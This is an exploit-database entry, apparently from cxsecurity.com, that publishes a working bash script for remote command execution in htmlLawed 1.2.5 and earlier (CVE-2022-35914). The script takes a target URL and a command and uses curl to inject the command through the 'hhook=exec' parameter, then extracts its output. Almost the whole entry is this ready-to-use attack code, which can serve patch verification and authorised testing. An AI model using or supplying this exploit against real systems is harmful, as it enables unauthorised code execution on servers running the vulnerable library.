htmlLawed 1.2.5 Remote Command Execution

2024.05.05
Credit: d4t4s3c
Risk: High
Local: No
Remote: Yes
CWE: CWE-78

#!/bin/bash # Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution # Date: 2024-05-02 # Exploit Author: Miguel Redondo (aka d4t4s3c) # Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed # Software Link: https://github.com/kesar/HTMLawed # Version: <= 1.2.5 # Tested on: Linux # Category: Web Application # CVE: CVE-2022-35914 while getopts ":u:c:" arg; do case ${arg} in u) url=${OPTARG}; let parameter_counter+=1 ;; c) cmd=${OPTARG}; let parameter_counter+=1 ;; esac done if [ -z "${url}" ] || [ -z "${cmd}" ]; then echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution" echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n" exit 1 else echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution" echo -e "\n[+] Executing Command: ${cmd}\n" cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\&nbsp; \[[0-9]+\] =\&gt;' | sed -E 's/\&nbsp; \[[0-9]+\] =\&gt; (.*)<br \/>/\1/') echo -e "${cmd_output}\n" exit 0 fi


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top